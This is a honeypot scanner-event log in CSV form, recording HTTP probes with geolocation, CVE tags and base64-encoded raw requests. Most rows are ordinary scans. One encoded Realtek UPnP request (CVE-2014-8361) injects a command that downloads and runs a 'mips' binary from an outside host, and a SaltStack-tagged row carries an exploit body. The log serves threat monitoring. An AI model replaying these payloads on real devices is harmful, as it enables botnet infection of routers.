Honeypot HTTP Scanner Events Report

"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id","pattern","http_url","http_agent","http_request_method","url_scheme","session_tags","vulnerability_enum","vulnerability_id","vulnerability_class","vulnerability_score","vulnerability_severity","vulnerability_version","threat_framework","threat_tactic_id","threat_technique_id","target_vendor","target_product","target_class","file_md5","file_sha256","request_raw","body_raw"
"2021-03-28 00:00:00","tcp","209.141.x.x",56456,53667,"US","NEVADA","LAS VEGAS",,518210,,,,,"102.16.x.x",81,37054,"MG","ANTANANARIVO","ANTANANARIVO",,,"Communications, Service Provider, and Hosting Service","CAPRICA-EU","http-scan",,,,,,,"login.cgi",,"GET","http",,,,,,,,,,,,,,,,"R0VUIGxvZ2luLmNnaSBIVFRQLzEuMQ0KDQo=",
"2021-03-28 00:00:00","tcp","167.248.x.x",48006,398722,"US","MICHIGAN","ANN ARBOR",,,,,,,"103.104.x.x",1521,139779,"KH","PHNOM PENH","PHNUM PENH",,,,"CAPRICA-EU","http-scan",,,,,,,"/","Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)","GET","http",,,,,,,,,,,,,,,,"R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEwMy4xMDQuNjEuNTI6MTUyMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKGNvbXBhdGlibGU7IENlbnN5c0luc3BlY3QvMS4xOyAraHR0cHM6Ly9hYm91dC5jZW5zeXMuaW8vKQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=",
"2021-03-28 00:00:00","tcp","198.54.x.x",44538,11878,"US","WASHINGTON","SEATTLE","static-198-54-x-x.cust.example.com",518210,,,,,"45.77.191.125",59134,20473,"US","CALIFORNIA","SAN JOSE",,,"Communications, Service Provider, and Hosting Service","CAPRICA-EU","http-scan",,,,,,,"/","Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0","HEAD","https",,,,,,,,,,,,,,,,"SEVBRCAvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0OyBydjo4Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzg2LjANCkhvc3Q6IHd3dw0KDQo=",
"2021-03-28 00:00:04","tcp","128.199.x.x",41760,14061,"SG","CENTRAL","SINGAPORE",,518210,"Communications, Service Provider, and Hosting Service",,,,"103.204.x.x",8088,134835,"JP","OSAKA","OSAKA",,,,"CAPRICA-EU","http-scan",,,,,,,"/ws/v1/cluster/apps/new-application","python-requests/2.12.4","POST","http",,,,,,,,,,,,,,,,"UE9TVCAvd3MvdjEvY2x1c3Rlci9hcHBzL25ldy1hcHBsaWNhdGlvbiBIVFRQLzEuMQ0KSG9zdDogMTAzLjIwNC4xNzIuMTE5OjgwODgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjEyLjQNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg==",
"2021-03-28 00:00:14","tcp","172.245.x.x",57286,36352,"US","CALIFORNIA","UPLAND",,518210,"Communications, Service Provider, and Hosting Service",,,,"37.59.130.87",9999,16276,"FR","ILE-DE-FRANCE","PARIS",,518210,"Communications, Service Provider, and Hosting Service","CAPRICA-EU","http-scan",,"enterprise",,,,,"/run","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0","POST","http","remote-code-execution;pre-auth;command-injection;shell-injection","CVE","CVE-2020-16846","CVSS","9.8","Critical","3.1","MITRE ATT&CK","TA0001;TA0002","T1190;T1059","SaltStack","Salt","other-software",,,"UE9TVCAvcnVuIEhUVFAvMS4xDQpIb3N0OiAzNy41OS54Lng6OTk5OQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTQ7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDMzNA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCnsKICAiam9iSWQiOiAxLAogICJleGVjdXRvckhhbmRsZXIiOiAiZGVtb0pvYkhhbmRsZXIiLAogICJleGVjdXRvclBhcmFtcyI6ICJkZW1vSm9iSGFuZGxlciIsCiAgImV4ZWN1dG9yQmxvY2tTdHJhdGVneSI6ICJDT1ZFUl9FQVJMWSIsCiAgImV4ZWN1dG9yVGltZW91dCI6IDAsCiAgImxvZ0lkIjogMSwKICAibG9nRGF0ZVRpbWUiOiAxNTg2NjI5MDAzNzI5LAogICJnbHVlVHlwZSI6ICJHTFVFX1NIRUxMIiwKICAiZ2x1ZVNvdXJjZSI6ICIiLAogICJnbHVlVXBkYXRldGltZSI6IDE2MTY4ODk2MTQ0MjcsCiAgImJyb2FkY2FzdEluZGV4IjogMCwKICAiYnJvYWRjYXN0VG90YWwiOiAwCn0K","ewogICJqb2JJZCI6IDEsCiAgImV4ZWN1dG9ySGFuZGxlciI6ICJkZW1vSm9iSGFuZGxlciIsCiAgImV4ZWN1dG9yUGFyYW1zIjogImRlbW9Kb2JIYW5kbGVyIiwKICAiZXhlY3V0b3JCbG9ja1N0cmF0ZWd5IjogIkNPVkVSX0VBUkxZIiwKICAiZXhlY3V0b3JUaW1lb3V0IjogMCwKICAibG9nSWQiOiAxLAogICJsb2dEYXRlVGltZSI6IDE1ODY2MjkwMDM3MjksCiAgImdsdWVUeXBlIjogIkdMVUVfU0hFTEwiLAogICJnbHVlU291cmNlIjogIiIsCiAgImdsdWVVcGRhdGV0aW1lIjogMTYxNjg4OTYxNDQyNywKICAiYnJvYWRjYXN0SW5kZXgiOiAwLAogICJicm9hZGNhc3RUb3RhbCI6IDAKfQ=="
"2021-03-28 00:00:21","tcp","122.115.x.x",30876,23724,"CN","BEIJING SHI","BEIJING",,,,,,,"41.223.x.x",52869,32437,"ZA","KWAZULU-NATAL","DURBAN",,,"Communications, Service Provider, and Hosting Service","CAPRICA-EU","http-scan",,"iot;consumer",,,,,"/picsdesc.xml","Hello-World","POST","http","remote-code-execution;pre-auth;command-injection","CVE","CVE-2014-8361",,,,,"MITRE ATT&CK","TA0001;TA0002","T1190;T1059","Realtek","Realtek SDK","embedded-system",,,"UE9TVCAvcGljc2Rlc2MueG1sIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogNjMwDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClNPQVBBY3Rpb246IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjEjQWRkUG9ydE1hcHBpbmcNCkFjY2VwdDogLw0KVXNlci1BZ2VudDogSGVsbG8tV29ybGQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzOkVudmVsb3BlIHhtbG5zOnM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvLyIgczplbmNvZGluZ1N0eWxlPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VuY29kaW5nLy8lMjIlM0U8czpCb2R5Pjx1OkFkZFBvcnRNYXBwaW5nIHhtbG5zOnU9InVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjEiPjxOZXdSZW1vdGVIb3N0PjwvTmV3UmVtb3RlSG9zdD48TmV3RXh0ZXJuYWxQb3J0PjQ3NDUwPC9OZXdFeHRlcm5hbFBvcnQ+PE5ld1Byb3RvY29sPlRDUDwvTmV3UHJvdG9jb2w+PE5ld0ludGVybmFsUG9ydD40NDM4MjwvTmV3SW50ZXJuYWxQb3J0PjxOZXdJbnRlcm5hbENsaWVudD5jZCAvdmFyLzsgd2dldCBodHRwOi8vMTkyLjIxMC54LngvbWlwczsgY2htb2QgK3ggbWlwczsgLi9taXBzPC9OZXdJbnRlcm5hbENsaWVudD48TmV3RW5hYmxlZD4xPC9OZXdFbmFibGVkPjxOZXdQb3J0TWFwcGluZ0Rlc2NyaXB0aW9uPnN5bmN0aGluZzwvTmV3UG9ydE1hcHBpbmdEZXNjcmlwdGlvbj48TmV3TGVhc2VEdXJhdGlvbj4wPC9OZXdMZWFzZUR1cmF0aW9uPjwvdTpBZGRQb3J0TWFwcGluZz48L3M6Qm9keT48L3M6RW52ZWxvcGU+DQoNCg==","PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzOkVudmVsb3BlIHhtbG5zOnM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvLyIgczplbmNvZGluZ1N0eWxlPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VuY29kaW5nLy8lMjIlM0U8czpCb2R5Pjx1OkFkZFBvcnRNYXBwaW5nIHhtbG5zOnU9InVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjEiPjxOZXdSZW1vdGVIb3N0PjwvTmV3UmVtb3RlSG9zdD48TmV3RXh0ZXJuYWxQb3J0PjQ3NDUwPC9OZXdFeHRlcm5hbFBvcnQ+PE5ld1Byb3RvY29sPlRDUDwvTmV3UHJvdG9jb2w+PE5ld0ludGVybmFsUG9ydD40NDM4MjwvTmV3SW50ZXJuYWxQb3J0PjxOZXdJbnRlcm5hbENsaWVudD5jZCAvdmFyLzsgd2dldCBodHRwOi8vMTkyLjIxMC54LngvbWlwczsgY2htb2QgK3ggbWlwczsgLi9taXBzPC9OZXdJbnRlcm5hbENsaWVudD48TmV3RW5hYmxlZD4xPC9OZXdFbmFibGVkPjxOZXdQb3J0TWFwcGluZ0Rlc2NyaXB0aW9uPnN5bmN0aGluZzwvTmV3UG9ydE1hcHBpbmdEZXNjcmlwdGlvbj48TmV3TGVhc2VEdXJhdGlvbj4wPC9OZXdMZWFzZUR1cmF0aW9uPjwvdTpBZGRQb3J0TWFwcGluZz48L3M6Qm9keT48L3M6RW52ZWxvcGU+DQoNCg=="